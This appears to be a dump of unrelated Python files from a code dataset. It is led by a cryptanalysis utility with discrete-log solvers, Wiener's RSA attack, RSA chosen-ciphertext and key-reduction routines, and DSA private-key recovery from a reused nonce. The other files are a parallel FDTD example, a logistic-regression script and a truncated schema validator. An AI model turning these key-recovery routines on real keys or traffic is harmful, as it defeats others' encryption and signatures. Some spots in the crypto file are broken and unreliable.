OpensslError('Log not found') \n\"\"\"\n #[OR]\n gpow=1\n #Baby-step\n for j in range(m) :\n if not(j in hashtable) :\n hashtable[gpow]=j\n gpow=(gpow*g)%N\n #Giant-step\n inv=euclideE(gpow, N) #we compute g^-m mod N; après baby-step, gpow vaut g^m\n y=h\n for i in range(m) :\n if y in hashtable :\n return i*m+hashtable[y]\n y=(y*inv)%N\n \n raise OpensslError('Log not found')\n\"\"\" \n\n\ndef F(N, h, g, x) :\n mod=x%3\n if mod==0 :\n return (x*x) % N\n if mod==1 :\n return (x*g) % N \n return (x*h) % N\n\ndef G(x, a, q) :\n mod=x%3\n if mod==0 :\n return (a+a) % q\n if mod==1 :\n return (a+1) % q \n return a%q\n\ndef H(x, b, q) :\n mod=x%3\n if mod==0 :\n return (b+b) % q\n if mod==1 :\n return b%q \n return (b+1)%q\n \ndef pollardrhobrent(h, g, q, N) :\n \"\"\" Polllard rho algorithm for discrete log\n >>> h : element of the group\n >>> g : generator of the group\n >>> q : a prime number, q is the order of the group\n >>> N : the modulus\n >>> out : x such that h = g^x mod p\n \"\"\"\n print('Execution of pollard rho for discrete log...')\n a=A=0\n b=B=0\n x=X=2\n while True :\n prec=x\n x=F(N, h, g, x)\n a=G(prec, a, q)\n b=H(prec, b, q)\n \n prec=X\n X=F(N, h, g, X)\n A=G(prec, A, q)\n B=H(prec, B, q)\n \n prec=X\n X=F(N, h, g, X)\n A=G(prec, A, q)\n B=H(prec, B, q)\n \n if x==X :\n print('Detected!!!')\n subB = (B-b) % q\n if subB==0:\n raise OpensslError('Failure with r=0!!!')\n# gc = gmpy2.gcd(subB, q)\n# if(gc != 1):\n# print(\"gcd is different than 1\")\n# print(subB)\n res=(gmpy2.invert(subB, q) * (a-A)) % q\n print('Discrete Log found : ', res)\n return res\n\ndef crt(modulus, reminds, N) :\n \"\"\"compute the crt of x=reminds_i mod modulus_i\n N := prod(modulus[i])\n \"\"\"\n _sum=0\n for i in range(len(modulus)) :\n bi=N//modulus[i]\n ai=euclideE(bi, modulus[i])\n _sum=(_sum+reminds[i]*bi*ai)%N\n return _sum\n\ndef fullcrt(modulus, reminds, N) :\n \"\"\"compute the full crt of x=reminds_i mod modulus_i^ei\n N := prod(modulus[i]^ei)\n \"\"\"\n _sum=0\n for i in range(len(modulus)) :\n mod=pow(modulus[i][0], modulus[i][1], N)\n bi=N//mod\n ai=euclideE(bi, mod)\n _sum=(_sum+reminds[i]*bi*ai)%N\n return _sum\n\ndef rho_crtForDSA(y, q, g, p) :\n \"\"\" rho Pohlig–Hellman algorithm for log discrete. \n Only for when all factors of the prime number (q) are distincts\n >>> y : element of the group\n >>> g : generator of the group\n >>> q : a prime number, q is the order of the group\n >>> p : the modulus\n >>> out : xi such that yi = gi^xi mod qi\n \"\"\"\n #factorisation of q\n print('-------------Finding all prime factors of q with Brent...')\n facts=brentMultipleFactors(q)\n print('Factors of q:', facts)\n \n #for test\n res = 1\n for x in facts:\n res *= x\n assert(res == q)\n \n #finding xi such as x=xi mod qi\n xi=[0] * len(facts)\n# xi[0]=98699490457#xi[1]=5765645707541#xi[2]=4726762747214#xi[3]=3364793818732#xi[4]=4967610363304#xi[5]=12389327632936\n \n for i in range(len(facts)) :\n print('-------------Finding x'+str(i)+' with Pollard rho for DL...')\n #prod of qj without qi\n prod=q//facts[i]\n _y= pow(y, prod, p)\n _g= pow(g, prod, p)\n xi[i]=pollardrhobrent(_y, _g, facts[i], p)\n \n assert(pow(_g, xi[i], p) == _y)\n\n \n #crt to reconstruct x\n #x = x0 mod q0\n #x = x1 mod q1\n #...\n #x = xn mod qn\n #with q0*q1*...*qn=q\n # -> crt to find x mod q0*q1*q2*...*qn = x mod q (qi are coprimes)\n print('-------------Finding x with CRT...')\n res=crt(facts, xi, q)\n return res\n\ndef subpohligprimepower(h , g, p, e, mod) :\n \"\"\"Pohlig–Hellman algorithm applied to the specific case for groups whose order is a prime power\n >>> h : element of the group\n >>> g : generator of the group\n >>> p : a prime power, p^e is the order of the group\n >>> mod : the modulus\n >>> out : x such that h = g^x mod p^e\n \"\"\"\n n=pow(p, e, mod)\n xk=0\n gamma=pow(g, pow(p, e-1, n), mod)\n for k in range(e) :\n gpow=pow(g, xk, mod)\n hk=pow(gmpy2.invert(gpow, mod)*h, pow(p, e-1-k, n), mod) #hk <- ((g^-x_k)*h)^(p^(e-1-k))\n dk=pollardrhobrent(hk, gamma, p, mod)\n xk=(xk+pow(p, k, mod)*dk)%n\n return xk\n\n\ndef dlg_fullpohlighellman(y, q, g, p) :\n \"\"\"Full Pohlig–Hellman algorithm applied for discrete log when q can have multiple identique factors\n >>> y : element of the group\n >>> q : order of the group\n >>> g : generator of the group\n >>> p : a prime number, the modulus\n >>> out : x such that y = g^x mod p\n \"\"\"\n print('-------------Finding all prime factors of q with Brent...')\n facts=brentMultipleFactors(q)\n dis_facts=[] #distincts factors of q\n e=1\n i=0\n while i 1\n ni = e[i]*n[i-1] + n[i-2]\n di = e[i]*d[i-1] + d[i-2]\n n.append(ni)\n d.append(di)\n yield (ni, di)\n #return n,dverify_sign('police/hush/dillonlambert_pk.pem','pLvYvgpez+9wXC797rPL2rSwYNrxt4HL8XE+91lxmrMUiAjq0TckCCt/PJ5lqtW+8Vc6SRDkefJm2eqeYSNvMq3FBt3XDA9VzZ7qUjiN2xXIRcvXbrc7kKk+Tc/D/rreciyKuZut8gW0a/gpyM2cVD7UqGzljoEBnXyN/rioelT/P5Bg5f61U3LikdZvsP64bpa0nosTD3q9ZHdyhPZ6e7Wxi51jp+twEu6WD5D+3WMEYCwJqdyIFMh9fFQBiW2IxkTOI3ofheN4PyEZO7bXOl9t0EHocFqTzzF4i4LNn10RoQfy7iwk9R5poOyWfwS/qys3OIyrtjCRuCl4pggodw==', 'manger')\n\ndef wienerAttack(e, N) :\n print('[-] Finding the continued fractions expansion convergents of e/N...')\n cf_exp= cf_expansion(e, N)\n cvgts= convergents(cf_exp)\n print('[+] continued fractions expansion convergents found')\n print(cf_exp)\n\n print('[-] Iterating over convergents; '\n 'Testing correctness through factorization.')\n for pk, pd in cvgts: # pk - possible k, pd - possible d\n if pk == 0:\n continue;\n possible_phi = (e*pd - 1)//pk\n p = sympy.Symbol('p', integer=True)\n roots = sympy.solve(p**2 + (possible_phi - N - 1)*p + N, p)\n\n if len(roots) == 2:\n pp, pq = roots # pp - possible p, pq - possible q\n if pp*pq == N:\n print('[+] Factoriisation of N found : p,q = (', pp, ',', pq, ')')\n return pp,pq\n\n print('[-] Wiener\\'s Attack failed; Factoriisation not found :(')\n \n\n\"\"\"------------------------------BEGIN TRAINING------------------------------\"\"\"\n \ndef train_eqlin(a, b, n) :\n \"\"\"return X such that a * X + b == 0 [modulo n]\n and X is known existed\n \"\"\"\n # aX + b = 0 mod n => aX = -b mod n\n return gmpy2.divm(-b, a, n)\n\ndef train_generator(q, a, b) :\n \"\"\"find G such taht G must be a generator of order q modulo P.\n P must be prime, and such that a <= P < b.\n \"\"\"\n k= math.ceil(a//q) #for q multiple > a\n p = a\n while p < b-1 :\n qm = q*k #multiple of q between a and b\n p = qm + 1\n if gmpy2.is_prime(p) :\n print('[+] p-1 multiple of q found...')\n #rs = gmpy2.random_state(hash(gmpy2.random_state()))\n h = 2#+int(gmpy2.mpz_random(rs, p-4)) # random g in [2, p-2]\n g = pow(h, (p-1)//q, p)\n if pow(g, q, p)==1 :\n print('[+] Generator G =', g, 'with P =', p, 'found')\n return g,p\n \n print('[-] Failed ! Trying with next multiple of q...')\n k+=1\n \n print('[-] Failed to find generator')\n raise ValueError()\n \ndef train_sqrt_modp(x, p) :\n \"\"\"Find the two square roots of x modulo p,\n convert them to bytes and print them.\n \"\"\"\n roots=sympy.sqrt_mod(x, p, all_roots=True)\n return (base64.b16decode(hex(roots[0])[2:], casefold=True), \n base64.b16decode(hex(roots[1])[2:], casefold=True))\n \ndef train_rsa_reduction(n, e, d) :\n \"\"\"You are given an RSA secret key.\n Find p and q and convert them to bytes\n \n code from : https://gist.github.com/ddddavidee/b34c2b67757a54ce75cb\n \"\"\"\n k = d * e - 1\n if gmpy2.is_odd(k) :\n raise ValueError('Prime factors p and q not found')\n else:\n t = 0\n r = k\n while(not gmpy2.is_odd(r)):\n r = int(r // 2)\n t += 1\n for i in range(1, 101):\n rs = gmpy2.random_state(hash(gmpy2.random_state()))\n g = int(gmpy2.mpz_random(rs, n)) # random g in [0, n-1]\n y = pow(g, r, n)\n if y == 1 or y == n - 1:\n continue\n else:\n for j in range(1, t): # j \\in [1, t-1]\n x = pow(y, 2, n)\n if x == 1:\n p, q = outputPrimes(y - 1, n)\n return (base64.b16decode(hex(p)[2:], casefold=True), \n base64.b16decode(hex(q)[2:], casefold=True))\n elif x == n - 1:\n continue\n y = x\n x = pow(y, 2, n)\n if x == 1:\n p, q = outputPrimes(y - 1, n)\n return (base64.b16decode(hex(p)[2:], casefold=True), \n base64.b16decode(hex(q)[2:], casefold=True))\n\ndef outputPrimes(a, n):\n p = int(gmpy2.gcd(a, n))\n q = int(n // p)\n if p > q:\n p, q = q, p\n return p,q \n\ndef train_rsa_malleability(n, e, C, Ci, Ma) :\n \"\"\" Algo description on https://crypto.stackexchange.com/questions/2323/how-does-a-chosen-plaintext-attack-on-rsa-work\n \n You are given an RSA public-key (n, e) and a ciphertext (C).\n If you provide a **different** ciphertext (Ca =! C), it will be decrypted.\n You must decrypt, convert to bytes and print the original text\n \n This is an Chosen-plaintext attack\n \n >>> n, e : public Key (modulus and exponent)\n >>> C : the ciphertext to break\n >>> Ci : The chosen ciphertext (without the pow 2) by attacker sent to Alice\n exple : if the ciphertext sent is 2^e, Ci=2\n >>> Ma : The plaintext corresponding to Ca (decrypted by Alice)\n \n Output : the plaintext corresponding to C\n \"\"\"\n #We know C = t^e mod n\n #we chose Ci=2^e and send Ca = Ci*C = 2^e * t^e = (2*t)^e\n #Alice will decrypt and will send us Ma = ((2*t)^e)^d = 2*t\n return (base64.b16decode(hex(Ma//Ci)[2:], casefold=True))\n\ndef train_rsa_msb(LB) :\n \"\"\"Obtain and print the plaintext with given an RSA public-key \n (the modulus n, the exponent e) and a ciphertext c.\n An oracle is available :\n If you provide a ciphertext, you will be given the MSB\n of the plaintext (i.e. True when plaintext >= n/2)\n \"\"\"\n #Let c the ciphertext and P the corresponding plaintext\n # rsa_msb c -> 0 => P < n/2\n # rsa_msb 2^e * c -> 0 => 2*P < n/2 => P < n/4\n #...\n #(applying successive dichotomie log2n * 2 time, we find LB<=P<=UB and LB==UB)\n #See train_rsa_msb/msb_client.py and train_rsa_msb/msb_netringsEncrypt.py\n #and execute :\n #>>> python3 train_rsa_msb/msb_client.py\n print(base64.b16decode(hex(LB)[2:], casefold=True))\n\n\"\"\"------------------------------END TRAINING------------------------------\"\"\"\n\n\ndef DSAregenK(p, q, g, y, r, s1, s2, file_msg1, file_msg2) :\n \"\"\"Recover the private key (x) of signed DSA messages with weak random k : k is not unique for all message\n Here, k is the same for the both message so r1 = r2 = r\n >>> p, q, g, y : the DSA public Key of the signed messages param\n >>> r, s1 : DSA signature of the message m1\n >>> r, s2 : DSA signature of the message m2\n >>> file_msg1, file_msg2 : files to message m1 and m2\n \n #exec : DSAregenK(int('BDADCF08B14F1D0F2916BAF99BFE906C83F3CAACC8438ED19DCAB0E2B802AE720638E51084B3DE6A7971F397A996BA8ECF7D8304EA7BE78EFFD526B14AE6C38BE169D185AB5AAD5BFADCDDECB2901F6E1B6579254FBDC259FB06FAF6CED8A9AA77F26447C816EA66C39282186291BB53DF42AC4218945C1ABCEFD6C007C8CA5FD39F72D1409E0680E2F82CE95C0EC350A0C6AE78E531F24388783591E51620B91215F5A9E1544AACE24A9223DAFF437CEF375372A408F8091835AD55DDE1877A9AF30B6E625319C262105B62296FDB47238DDC08F3BC8B089BDB3AA528D6A52DC2323E18B9A6B9821CE81C3010BA3CE02DEF6E44CEF5529F20BF1C63004D9251', base=16), \n int('B44525D1BEBCD9D5DDB7FE84EE71A9117DC312173D3C96645A534E397F7BA395', base=16), \n int('4A9F9831BAE9D9E5A2FF813D1D69DEC22609A2C81F46057562D20DD15C4B398EC80C45AEB801021BD9CC2F3DE3EB59C556ADC6C83C791053EA4256FB44ECA40CD0F870F39B07CB973AED2348082B16347929892A7E80ED5E1DB6D55250B5A6BE245BC9F89431EBC79C0FF1FEDFAFC157CD12380F5FCBF34F1A64A59954CA1F8EE08F6E128E732297A481399A95C3F2540D40185AFB81816D727F39DF922DF2F6CEEB9FF35E1BC177B2009B6776D14EB9C2CF62B595925ED76C5545FD1968F76DCF25D9C80E0F319282407A499352AB9FE2D04A1323CE18B54C17998F3B851FCDAA9DE59CD0AD6350474BA4A6A6F591E069AE39A3068291D1486B7C6B0D14FB5A', base=16), \n int('04527386FE97790AAD1E70016010CF096022656AE7A36232D257DBE97267189DF8C8FC7D0237E34CAB3747D66AF095384FF6C8D2F9337B99359F27A8FD194DA6B21AE5292010D30D6711215EDC9FD95DD47506A6584AEE4CE519248BC02F4F0AFE61B5C96C340D5F2B3B39B2FEF5BD40365DA8E6767793C0486C141CDE0A01397EF5848E11408CADB96B7248916295967FA515ACC4BC48DD35913B8D3F2C0CE117EFC153557C022AC89A219BE5EDE1ECA847D63C23E35A225D4ACF18E5896E8F6181B501F738A902F4EE7529080E327D05106A498E87212CABCA4DDB69F48DA04EDBE7C9B7E69D97A12E341EC88F7A1BDEB118E31C1CB296674C4488282F1BB9', base=16), \n int('268F889EA93CD3DC56B69FB5CBDF2C486F8886B0647928B685C52DEAF30A6A0F', base=16), \n int('71059E7D7464D41121BB55F5E918CC985F3E1AB9CFDA971FA08A30BD9C069184', base=16), \n int('6F64140C9A928461FA74EE7EF9312ECFDAE5B1589DA835E04BF11200FCAA2E8A', base=16), \n 'inHushTodo/murphykimberly_m1.txt', 'inHushTodo/murphykimberly_m2.txt')\n \"\"\"\n #loading message from files\n with open(file_msg1) as f:\n msg1 = f.read()\n f.closed\n with open(file_msg2) as f:\n msg2 = f.read()\n f.closed\n \n h1 = int(sha256(msg1.encode()).hexdigest(), base=16)\n h2 = int(sha256(msg2.encode()).hexdigest(), base=16)\n #we have : r1 = (g^k1 mod p) mod q and r2 = (g^k2 mod p) mod q\n #if r1 == r2 -> (g^k1 mod p) mod q == (g^k2 mod p) mod q -> k1 == k2\n #so r1 = r2 = k and k1 = k2 = k\n \n #we also have : s1 = k^(-1)*h1 + xr -> s1*k = h1 + xr (1.1)\n #and s2 = k^(-1)*h2 + xr -> s2*k = h2 + xr (1.2)\n #GAUSSIAN ELIMINATION\n # s1*k/r = h1/r + x mod q (dividing 1.1 by r) (2.1)\n # s2*k - s1*k = h2 - h1 mod q (Subtract 2.1 times r2 from 1.2) (2.2)\n\n #NEXT step\n # k = (h2 - h1) / (s2 - s1) (dividing 2.2 by (s2 - s1))\n k = ((h2 - h1) * euclideE(s2 - s1, q)) % q\n\n # x = s1*k/r - h1/r mod q (Swap terms of 2.1)\n inv_r=euclideE(r, q)\n x = ((s1 * k) * inv_r - h1 * inv_r) % q\n \n assert(y == pow(g, x, p))\n \n# print(p, q, g) \n return x","sub_path":"crypto_utils.py","file_name":"crypto_utils.py","file_ext":"py","file_size_in_byte":29396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"235342749","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\n# For better print formatting\nfrom __future__ import print_function\n\n# Imports\nfrom pycompss.api.parallel import parallel\nfrom pycompss.api.constraint import constraint\nfrom pycompss.api.task import task\nfrom pycompss.api.api import compss_barrier\nfrom pycompss.api.api import compss_wait_on\n\nimport numpy as np\n\n\n############################################\n# MATRIX GENERATION\n############################################\n\ndef initialize_variables(n_size):\n h = create_matrix(n_size)\n e = create_matrix(n_size)\n\n return h, e\n\n\ndef create_matrix(n_size):\n mat = []\n for i in range(n_size):\n mb = create_entry(i, n_size)\n mat.append(mb)\n return mat\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=1)\ndef create_entry(index, n_size):\n return np.float64(np.float64(index) / np.float64(n_size))\n\n\n############################################\n# MAIN FUNCTION\n############################################\n\n@parallel(tile=True)\ndef fdtd_1d(e, h, n_size, t_size, coef1, coef2):\n # Debug\n if __debug__:\n e = compss_wait_on(e)\n h = compss_wait_on(h)\n print(\"Matrix E:\")\n print(e)\n print(\"Matrix H:\")\n print(h)\n\n # Compute expected result\n if __debug__:\n import copy\n e_seq = copy.deepcopy(e)\n h_seq = copy.deepcopy(h)\n h_expected = seq_fdtd_1d(e_seq, h_seq, n_size, t_size, coef1, coef2)\n\n # FDTD\n for _ in range(t_size):\n for i in range(1, n_size):\n # e[i] -= coef1 * (h[i] - h[i - 1])\n e[i] = compute_e(e[i], coef1, h[i], h[i - 1])\n for i in range(n_size - 1):\n # h[i] -= coef2 * (e[i + 1] - e[i])\n h[i] = compute_h(h[i], coef2, e[i + 1], e[i])\n\n # Debug result\n if __debug__:\n h = compss_wait_on(h)\n\n print(\"New Matrix H:\")\n print(h)\n\n # Check result\n if __debug__:\n check_result(h, h_expected)\n\n\n############################################\n# MATHEMATICAL FUNCTIONS\n############################################\n\ndef compute_e(e, coef1, h2, h1):\n # import time\n # start = time.time()\n\n return e - coef1 * (h2 - h1)\n\n # end = time.time()\n # tm = end - start\n # print \"TIME: \" + str(tm*1000) + \" ms\"\n\n\ndef compute_h(h, coef2, e2, e1):\n # import time\n # start = time.time()\n\n return h - coef2 * (e2 - e1)\n\n # end = time.time()\n # tm = end - start\n # print \"TIME: \" + str(tm*1000) + \" ms\"\n\n\n############################################\n# RESULT CHECK FUNCTIONS\n############################################\n\ndef seq_fdtd_1d(e, h, n_size, t_size, coef1, coef2):\n for _ in range(t_size):\n for i in range(1, n_size):\n e[i] -= coef1 * (h[i] - h[i - 1])\n for i in range(n_size - 1):\n h[i] -= coef2 * (e[i + 1] - e[i])\n\n return h\n\n\ndef check_result(result, result_expected):\n is_ok = np.allclose(result, result_expected)\n print(\"Result check status: \" + str(is_ok))\n\n if not is_ok:\n raise Exception(\"Result does not match expected result\")\n\n\n############################################\n# MAIN\n############################################\n\nif __name__ == \"__main__\":\n # Import libraries\n import time\n\n # Parse arguments\n import sys\n\n args = sys.argv[1:]\n NSIZE = int(args[0])\n TSIZE = int(args[1])\n COEF1 = np.float64(0.5)\n COEF2 = np.float64(0.7)\n\n # Log arguments if required\n if __debug__:\n print(\"Running fdtd-1d application with:\")\n print(\" - NSIZE = \" + str(NSIZE))\n print(\" - TSIZE = \" + str(TSIZE))\n print(\" - COEF1 = \" + str(COEF1))\n print(\" - COEF2 = \" + str(COEF2))\n\n # Initialize matrices\n if __debug__:\n print(\"Initializing matrices\")\n start_time = time.time()\n H, E = initialize_variables(NSIZE)\n compss_barrier()\n\n # Begin computation\n if __debug__:\n print(\"Performing computation\")\n fdtd_start_time = time.time()\n fdtd_1d(E, H, NSIZE, TSIZE, COEF1, COEF2)\n compss_barrier(True)\n end_time = time.time()\n\n # Log results and time\n if __debug__:\n print(\"Post-process results\")\n total_time = end_time - start_time\n init_time = fdtd_start_time - start_time\n fdtd_time = end_time - fdtd_start_time\n\n print(\"RESULTS -----------------\")\n print(\"VERSION AUTOPARALLEL\")\n print(\"NSIZE \" + str(NSIZE))\n print(\"TSIZE \" + str(TSIZE))\n print(\"DEBUG \" + str(__debug__))\n print(\"TOTAL_TIME \" + str(total_time))\n print(\"INIT_TIME \" + str(init_time))\n print(\"FDTD_TIME \" + str(fdtd_time))\n print(\"-------------------------\")\n","sub_path":"examples/fdtd-1d/autoparallel/fdtd-1d.py","file_name":"fdtd-1d.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"217114366","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 23 13:19:22 2017\n\n@authors: Group-8\n\nScript Name: SCP_01_Logistic_Regression_Model.py\n\nScript Description : This script loads the pre-processed files, split the data into 80-20% training-test set\n and applies Logistic Regression model. It also displays the Accuracy, Precision, Recall and F1 Score.\n \n\"\"\"\n\n#Import Libraries\nfrom sklearn.cross_validation import train_test_split\nimport numpy as np\nimport os\nfrom sklearn.metrics import confusion_matrix\nimport pandas as pd\nimport time\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2\n\n#FilePath\nFILEPATH = \"/Users/Avirup/Desktop/Fall, 2017/Introduction to Data Mining/Projects/Final Project/\"\n\n#Features file name\nFEATURESET_FILENAME = \"features_reviews_Clothing_Shoes_and_Jewelry.pickle\"\n\n#File containing the converted DataFrame\nDATAFRAME_FILENAME = \"reviews_Clothing_Shoes_and_Jewelry.pickle\"\n\n\n#Input Parameters\n\n#Number of important features to be retained\nNUM_FEATURES = 10\n#Number of maximum iterations\nNUM_ITER = 1000\n#Learning rate for gradient computation\nLEARNING_RATE = 5e-5\n\n\n\n#Function to compute the sigmoid function\ndef fun_sigmoid(scores):\n return 1 / (1 + np.exp(-scores))\n\n\n#Function to compute the log likelihood values\ndef fun_log_likelihood(features, labels, weights):\n scores = np.dot(features, weights)\n ll = np.sum( labels*scores - np.log(1 + np.exp(scores)) )\n return ll\n\ndef fun_logistic_regression_train(features, labels, num_steps, learning_rate):\n \n weights = np.zeros(features.shape[1])\n \n for step in xrange(num_steps):\n \n #Calculate scores based on sigmoid function\n scores = np.dot(features, weights)\n predictions = fun_sigmoid(scores)\n\n #Weight updation with gradient ascent\n out_err_val = labels - predictions\n gradient = np.dot(features.T, out_err_val)\n weights += learning_rate * gradient\n \n # Print log-likelihood values of convergence \n if step % 10 == 0:\n \n print (\"Log Likelihood value for step : \" + str(step) + \" is \" + str(fun_log_likelihood(features, labels, weights)) + \"\\n\")\n \n return weights\n\n#Check the start time\nstart_time = time.time()\n\n#Load the pre-processed pickle files\nif os.path.exists(FILEPATH + FEATURESET_FILENAME) and os.path.exists(FILEPATH + FEATURESET_FILENAME):\n print (\"Loading the file containing features...\\n\")\n features = pd.read_pickle(FILEPATH + FEATURESET_FILENAME)\n print (\"Feature Set Pickle file loaded.\\n\")\n \n print (\"Loading file containing input dataframe...\\n\")\n input_data = pd.read_pickle(FILEPATH + DATAFRAME_FILENAME)\n print (\"Input Dataframe Pickle file loaded.\\n\")\n \n #Set the max number of features\n if(NUM_FEATURES > features.shape[1]):\n print(\"Invalid Value for NUM_FEATURES. Selecting All Features.\")\n NUM_FEATURES = features.shape[1]\n \n #Reducing the number of features \n test = SelectKBest(score_func=chi2, k= NUM_FEATURES)\n fit = test.fit(features, input_data['Helpful'])\n best_features = fit.transform(features)\n \n print(\"Splitting the data into training and testing sets....\\n\")\n X_train, X_test, Y_train, Y_test = train_test_split(best_features.todense(),input_data['Helpful'], \n test_size=0.2, random_state=1000,stratify = input_data['Helpful'])\n print(\"Training and Test data set created successfully.\\n\")\n \n \n #Training the dataset using logistic regression\n print (\"Training the dataset using logistic regression....\\n\")\n model_weights = fun_logistic_regression_train(np.array(X_train), Y_train, \n num_steps = NUM_ITER, learning_rate = LEARNING_RATE)\n print(\"Logistic Regression Model Trained Successfully.\\n\")\n \n #Testing the dataset using the trained model weights\n print(\"Predicting Class Labels on Test Data...\\n\")\n final_scores = np.dot(np.array(X_test), model_weights)\n test_preds = np.round(fun_sigmoid(final_scores))\n print(\"Class Labels prediction completed.\\n\")\n \n #Confusion Matrix Values\n tn, fp, fn, tp = confusion_matrix(Y_test, test_preds).ravel()\n \n #Computing Precision, Recall, Accuracy and F1 Score Values\n if (tp > 0 or fp > 0 ):\n Precision = (float(tp)/(tp+fp)) * 100\n else :\n print (\"Both true and false positives are zero.\\n\")\n Precision = 0\n \n if (tp > 0 or fn > 0):\n Recall = (float(tp)/(tp+fn)) * 100 \n else:\n print (\"Both true positive and false negative are zero.\\n\")\n Recall = 0\n\n if (tp > 0 or fp > 0 or tn > 0 or fn > 0):\n Accuracy = (float(tp+tn)/(tp+fp+tn+fn))*100 \n else:\n print (\"All values in Confusion Matrix is zero.\\n\")\n Accuracy = 0 \n \n if (Precision > 0 or Recall > 0):\n F1 = (2*Precision*Recall/(Precision+Recall))\n else:\n print (\"Both Precision and Recall is zero.\\n\")\n F1 = 0\n \n #Computing Model Accuracy\n print ('Logistic Regression Model Accuracy: {0}%\\n'.format(Accuracy))\n \n #Computing Model Precision\n print ('Logistic Regression Model Precision: {0}%\\n'.format(Precision))\n \n #Computing Model Recall\n print ('Logistic Regression Model Recall: {0}%\\n'.format(Recall))\n \n #Computing Model F1 Score\n print ('Logistic Regression Model F1 Score: {0}'.format(F1))\n \n \nelse:\n print(\"No Pre-processed Pickle Files found. Please execute the pre-processing script.\\n\")\n \n#Elapsed Time\nprint(\"\\nElapsed Time --- %s Minutes ---\" % round((time.time() - start_time)/float(60),2)) \n\n","sub_path":"SCP_01_Logistic_Regression_Model.py","file_name":"SCP_01_Logistic_Regression_Model.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"607294805","text":"def fluxoMaximo(link):\n '''\n Input: Grafo dirigido e ponderado (capacidades)\n Output: Um print do Fluxo Máximo para este Grafo.\n '''\n a = open(link, \"r\")\n lines = a.readlines()\n for line in lines:\n if \"p \" in line:\n quantidadeVertices = line.split()[2]\n matrizCapacidades = [[0 for x in range(int(quantidadeVertices))] for y in range(int(quantidadeVertices))]\n if (\"a \" in line) and \" a \" not in line:\n u = line.split()[1]\n v = line.split()[2]\n c = line.split()[3]\n matrizCapacidades[int(u) - 1][int(v) - 1] = int(c)\n s = 0\n t = int(quantidadeVertices) - 1\n n = len(matrizCapacidades)\n F = [[0] * n for _ in range(n)]\n # Capacidade residual de u para v é matrizCapacidades[u][v] - F[u][v]\n while True:\n caminho = BFS(matrizCapacidades, F, s, t)\n if not caminho:\n break\n u,v = caminho[0], caminho[1]\n fluxo = matrizCapacidades[u][v] - F[u][v]\n for i in range(len(caminho) - 2):\n u,v = caminho[i + 1], caminho[i + 2]\n fluxo = min(fluxo, matrizCapacidades[u][v] - F[u][v])\n for i in range(len(caminho) - 1):\n u,v = caminho[i], caminho[i + 1]\n F[u][v] += fluxo\n F[v][u] -= fluxo\n print('Fluxo Máximo = '+str(sum([F[s][i] for i in range(n)])))\n\ndef BFS(C, F, s, t):\n P = [-1] * len(C)\n P[s] = s\n fila = [s]\n while fila:\n u = fila.pop(0)\n for v in range(len(C)):\n if C[u][v] - F[u][v] > 0 and P[v] == -1:\n P[v] = u\n fila.append(v)\n if v == t:\n caminho = []\n while True:\n caminho.insert(0, v)\n if v == s:\n break\n v = P[v]\n return caminho\n return None","sub_path":"A3/fluxoMaximo.py","file_name":"fluxoMaximo.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"52121821","text":"#!/usr/bin/env python\n\n# Rough and dirty validation of upstream RAML+JsonSchema\n\nfrom __future__ import print_function\nimport logging\nimport json\nimport jsonschema\nimport sys\nimport argparse\nimport collections\n\nimport python_jsonschema_objects\n\n\nknown_schemas = []\n\n\nstats = collections.Counter()\n\n\nclass TestValidationError(RuntimeError):\n def __init__(self, message, context, exception=None):\n super(RuntimeError, self).__init__(message)\n self.innerexception = exception\n self.context = context\n\n stats[self.__class__.__name__] += 1\n\n def __str__(self):\n return \"%s: %s\" % (self.__class__.__name__, self.context)\n\n\nclass Empty(TestValidationError):\n \"\"\"The example or schema was blank. It should be populated.\"\"\"\n\n\nclass EmptySchema(Empty):\n \"\"\"The example or schema was blank. It should be populated.\"\"\"\n\n\nclass EmptyExample(Empty):\n \"\"\"The example or schema was blank. It should be populated.\"\"\"\n\n\nclass SchemaValidationError(TestValidationError):\n \"\"\"The schema was invalid.\"\"\"\n\n\nclass ExampleVsSchemaValidationError(TestValidationError):\n \"\"\"The example was invalid according to the schema.\"\"\"\n\n\nclass Schema03(SchemaValidationError):\n \"\"\"JSONSchema03 shouldn't be used.\"\"\"\n\n\nclass UnknownSchemaType(TestValidationError):\n \"\"\"Schema isn't JSONSchema03 or JSONSchema04\"\"\"\n\n\ndef test_example_against_schema(examplestring, schema, verb=None, path=None, ctx=None):\n \"\"\"\n Example is a raw blob of JSON.\n Schema has already been parsed to an OrderedDict.\n \"\"\"\n context = \"{} {} {}\".format(verb, path, ctx)\n\n try:\n if examplestring is None:\n raise EmptyExample('Missing example.', context=context)\n\n if schema is None:\n raise EmptyExample('Missing schema.', context=context)\n\n try:\n example = json.loads(examplestring)\n except Exception as e:\n raise SchemaValidationError(\"Schema isn't valid JSON.\", context=context, exception=e)\n if example == {}:\n raise EmptyExample(\"Example = {}\", context=context)\n\n if args.no3 and schema['$schema'] == 'http://json-schema.org/draft-03/schema':\n raise Schema03('', context=context)\n\n if type(schema)==str:\n schema_string_reason = None\n try:\n json.loads(schema)\n except Exception as e:\n schema_string_reason = e\n raise SchemaValidationError(\"Schema is a string??\", context=context, exception=schema_string_reason)\n\n if schema['$schema'] in [\n 'http://json-schema.org/draft-03/schema',\n 'http://json-schema.org/draft-04/schema',\n 'http://json-schema.org/draft-03/schema#',\n 'http://json-schema.org/draft-04/schema#']:\n try:\n jsonschema.validate(example, schema)\n if not args.quiet:\n logging.debug('Valid: {}'.format(context))\n stats['Valid'] += 1\n if 'id' not in schema:\n schema['id'] = (\"{}-{}-{}\".format(path, verb, ctx)).replace(\"/\",\"_\")\n\n if schema['id'] in [x['id'] for x in known_schemas]:\n logging.warning(\"%s already in known_schemas!\")\n known_schemas.append(schema)\n\n\n\n return True\n\n except jsonschema.exceptions.SchemaError as e:\n raise 